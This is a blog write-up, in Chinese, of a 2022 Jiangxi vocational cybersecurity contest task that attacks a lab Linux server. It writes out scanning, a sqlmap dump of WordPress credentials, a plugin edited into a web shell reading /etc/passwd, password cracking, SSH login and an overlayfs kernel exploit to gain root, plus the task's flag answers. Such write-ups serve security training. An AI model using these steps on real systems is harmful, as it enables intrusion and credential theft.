2022江西省职业技能大赛 网络安全(备) B-4 解析

最新推荐文章于 2023-04-15 11:08:53 发布
最新推荐文章于 2023-04-15 11:08:53 发布
阅读量434 收藏 3
点赞数 2
文章标签: web安全 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hu060107/article/details/129435042
版权

2022江西省职业技能大赛 网络安全(备) B-4 解析

B-4任务四:Linux操作系统渗透测试

1. 通过本地PC中渗透测试平台Kali对服务器场景Server4进行系统服务及版本扫描渗透测试,并将该操作显示结果中21端口对应的服务版本信息字符串作为flag值提交;

这个简单 nmap 扫描就好了
┌──(root💀Kali)-[~/桌面]
└─# nmap -sV 172.16.2.30  
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-09 20:45 CST
Stats: 0:00:12 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 80.00% done; ETC: 20:45 (0:00:03 remaining)
Nmap scan report for 172.16.2.30
Host is up (0.0047s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.2
22/tcp   open  ssh      OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.7 ((Ubuntu))
443/tcp  open  ssl/http Apache httpd
8080/tcp open  http     Apache httpd
MAC Address: 52:54:00:BA:BE:00 (QEMU virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.92 seconds
flag:vsftpd 3.0.2

2. 找到/var/www目录中的图片文件,将文件名称作为flag值提交;

这题通过 sql注入获取服务器账户密码 步骤如下:
1. 80 端口 dirb 扫描获取到 login.php 页面
dirb http://172.16.2.30/
2. sql 注入 获取到 WordPress 的管理员账户密码(admin,SuperSecretPassword)
sqlmap -u "http://172.16.2.30/login.php" --data="user=1&password=1&s=Submit" --dbs --batch --time-sec 1 -D wordpress8080 -T users --dump
3. 通过 WordPress插件 获取全部用户名称
登录网站后台—点击插件—选择:你好多利 ----编辑----改成如下----保存刷新网页即可获取所有用户
<?php
/**
 * @package Hello_Dolly
 * @version 1.6
 */
/*
Plugin Name: Hello Dolly
Plugin URI: http://wordpress.org/plugins/hello-dolly/
Description: This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from <cite>Hello, Dolly</cite> in the upper right of your admin screen on every page.
Author: Matt Mullenweg
Version: 1.6
Author URI: http://ma.tt/
*/
echo(system('cat /etc/passwd'));

?>
保存所有用户名使用john爆破即可密码是sql注入获取的密码
4. 使用爆破的密码 ssh远程登录帐号(user,SuperSecretPassword)
ssh user@172.16.2.30
flag: avpeurhbngvp.png

3. 找到/var/www目录中的图片文件,将图中的英文单词作为flag值提交;

flag:braveheart

4. 找到/home/guest目录中的txt文件,将文件内容作为flag值提交;

flag:bvauytfqvueye

5. 找到/root目录中的txt文件,将文件内容作为flag值提交。

这题需要提权,步骤如下:
1. 获取体统内核版本号(3.13.0)
uname -a
# Linux Kiowizity 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
2. 使用 searchsploit 查找内核漏洞(37292.c)
searchsploit 3.13.0

#---------------------------------------------------------------------------- ---------------------------------
# Exploit Title                                                              |  Path
#---------------------------------------------------------------------------- ---------------------------------
#Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' L | linux/local/37292.c
#Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' L | linux/local/37293.txt
#---------------------------------------------------------------------------- ---------------------------------
3. 将文件传到靶机进行提权
# Kali
scp /usr/share/exploitdb/exploits/linux/local/37292.c user@172.16.2.30:/tmp
# 靶机
gcc 37292.c
chmod +x a.out
./a.out
flag:mnvlkedjqafnv
liangliang0107
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
2022中职网络安全赛项吉安市竞赛B模块解析 (超详细)
Jay
12-20 867
从靶机服务器的FTP上下载wireshark0051.pcap数据包文件,找出黑客获取到的可成功登录目标服务器FTP的账号密码,并将黑客获取到的账号密码作为Flag值(用户名与密码之间以英文逗号分隔,例如:root,toor)提交;6. 继续分析数据包wireshark0051.pcap,找出黑客暴力破解目标服务器Telnet服务并成功获取到的用户名与密码,并将获取到的用户名与密码作为Flag值(用户名与密码之间以英文逗号分隔,例如:root,toor)提交;命令查看user1的密码,将回显结果截图。
2022全国中职网络安全国赛赛题思路(仅自己一个做题的思路)——网络安全竞赛试题(5)
panda.
04-03 7288
有word文档,要的私信我 仅仅一个做题思路 竞赛内容 A-1任务一 登录安全加固(Windows) 1.密码策略 a.密码策略必须同时满足大小写字母、数字、特殊字符; b.强制密码历史为5个密码; c.密码最长存留期为45天; d.最小密码长度不少于8个字符。 2.用户安全管理 a.禁止普通用户使用注册表编辑工具以及Ctrl+Alt+Del; b.交互式登录时不显示用户名; c.设置取得文件或其他对象的所有权,将该权限只指派给administrators
CTF之Kioptrix Level 1.2 靶机渗透(SQL注入 sudoers提权)
afei001
07-25 475
     练习环境     攻击机:kali     靶机:Kioptrix Level 1.2     下载地址:https://download.vulnhub.com/kioptrix/KVM3.rar      1.发现靶机,端口扫描 root@kali:~# netdiscover -r 10.10.10.0/16 IP At MAC Address Count Len MAC Vendor / Hostname ---------.
2022江西省职业院校技能大赛中职网络空间安全” 比赛任务书
m0_45155797的博客
04-15 286
每个参赛队拥有专属的堡垒机服务器,其他队不能访问。4.靶机服务器上的网站可能存在文件包含漏洞,要求选手找到文件包含的相关漏洞,与别的漏洞相结合获取一定权限并进行提权;5.操作系统提供的服务可能包含了远程代码执行的漏洞,要求用户找到远程代码执行的服务,并利用此漏洞获取系统权限;2.靶机服务器上的网站可能存在命令注入的漏洞,要求选手找到命令注入的相关漏洞,利用此漏洞获取一定权限;2.堡垒服务器上的网站可能存在命令注入的漏洞,要求选手找到命令注入的相关漏洞,利用此漏洞获取一定权限;
2022中职网络安全江西省赛题解析—B-1:Windows操作系统渗透
weixin_57060854的博客
12-29 960
学习交流,或者遇到不会的可以+qq:3455475542。ü 服务器场景操作系统:Windows(版本不详)ü 服务器场景:Server2105(关闭链接)
2021江苏省职业院校技能大赛中职网络信息安全赛项试卷
FogIslandBay的博客
09-25 5935
任务五:Linux操作系统渗透测试 通过渗透机Kali对靶机服务器进行系统服务及版本扫描渗透测试,并将该操作显示结果中21端口对应的服务版本信息字符串作为Flag值提交;(1分) 通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp文件的文件名称作为Flag值提交;(1分) 通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp的图片文件中的英文单词作为Flag值提交;(1分) 通过渗透机Kali对靶机服务器进行渗
2021江西省网络安全职业技能竞赛赛题wp全!
12-21
2021江西省网络安全职业技能竞赛是一项旨在检验参赛者在网络安全领域专业技能的比赛。比赛共分为三个阶段,总时长420分钟,涵盖多个任务,涉及登录安全加固、系统漏洞利用与提权、CTF夺旗等核心内容。 **A模块:...
2021江西省网络空间安全职业技能大赛全过程解析
04-20
江西省赛全过程解析,适用小白那种都会
2022江西省第一届职业技能大赛萍乡市选拔赛-电子商务师项目技术文件.docx
12-17
2022江西省第一届职业技能大赛萍乡市选拔赛的电子商务师项目技术文件,是针对参赛者的一项重要指导文档,旨在明确比赛规则、考核内容和评分标准,确保赛事的公平公正。电子商务师是现代商业环境中不可或缺的角色,...
2023江西省职业院校技能竞赛网络安全赛项样题
最新发布
11-02
一、竞赛项目简介 “网络安全”竞赛共分 A.基础设施设置与安全加固;B. 网络安全 事件响应、数字取证调查和应用安全;C.CTF 夺旗-攻击;D. CTF 夺旗 - 防御等四个模块。竞赛时间安排和分值权重见表
2022江西省振兴杯技能竞赛电子商务技术文件教师.doc
11-20
江西省“振兴杯”技工院校职业技能竞赛是针对技工院校教师的一次专业技能比拼,旨在提升教师在电子商务领域的教学能力和实践技能。这次竞赛的技术文件详细规定了比赛的各个方面,包括竞赛原则、日程、形式、地点、...
网安赛题整理
武恩赐
02-13 1174
网安赛题整理
中职网络空间安全赛项”竞赛——渗透测试
m0_45155797的博客
04-06 233
操作有什么问题,麻烦师傅们指出!
2021 职业院校技能大赛网络安全”项目 江西省比赛任务书
weixin_50463931的博客
12-29 5263
2021 职业院校技能大赛网络安全”项目 江西省比赛任务书
中职网络安全2022国赛之隐写术应用
Ba1_Ma0的博客
04-26 3733
简介 有什么不会的可以来问我:3316735898,需要题目,解题工具和脚本的也可以来找我 1.找出文件夹1中的文件,将文件中的隐藏信息作为Flag值提交 打开文件 将文件放入kali,查询文件内部是否有其他文件 binwalk final.png 发现有一个地址开头为0x1D55DC的图片,我们可以手动将它分离,也可以使用工具将他分离,这里我们使用手工,打开HXD HEX ctrl+e 设置起始地址为1D55DC 然后ctrl+c复制1D55DC之后的十六进制值,新建一个文件,ctrl+v粘贴,
DC-3靶机笔记
weixin_43263451的博客
08-16 481
DC-3DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. As with the previous DC releases, this one is designed with beginners in m...
2021中职网络空间安全最新国赛赛题解析仅代表自己的建议——zz-网络安全试题(6)解析
PushSafe
05-27 747
2021全国职业院校技能大赛中职网络安全竞赛试题 (6) (总分100分) 赛题说明 一、竞赛项目简介 “网络安全”竞赛共分A. 基础设施设置与安全加固;B. 网络安全事件响应、数字取证调查和应用安全;C. CTF夺旗-攻击;D. CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。 表1 竞赛时间安排与分值权重 模块编号 模块名称 竞赛时间 (小时) 权值 A 基础设施设置与安全加固 3
2022中职网络安全国赛A模块题目解析
qq_57147160的博客
04-13 8886
2022全国职业院校技能大赛中职网络安全竞赛试题 (1) (总分100分) 赛题说明 一、竞赛项目简介 “网络安全”竞赛共分A.基础设施设置与安全加固;B.网络安全事件响应、数字取证调查和应用安全;C.CTF夺旗-攻击;D.CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。 表1 竞赛时间安排与分值权重 模块编号 模块名.
Web渗透测试
旺仔Sec&blog
11-23 2281
任务环境说明: 服务器场景: 服务器场景操作系统:未知(封闭靶机) 将PHP的版本号作为Flag值提交;(例如:5.2.14) 将MySQL数据库的版本号作为Flag值提交;(例如:5.0.22) 将系统的内核版本号作为Flag值提交;(例如:2.6.18) 将网站后台管理员admin用户的密码作为Flag值提交; 将/root目录中txt文件的内容作为Flag值提交。 ...
"2021江西省网络安全职业技能竞赛任务书及拓扑图
2021江西省网络安全职业技能竞赛的赛题为wp全!比赛任务涵盖了登录安全加固、Web安全加固、流量完整性保护与事件监控、防火墙策略、Windows操作系统安全配置、Linux操作系统安全配置、系统漏洞利用与提权、Linux...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值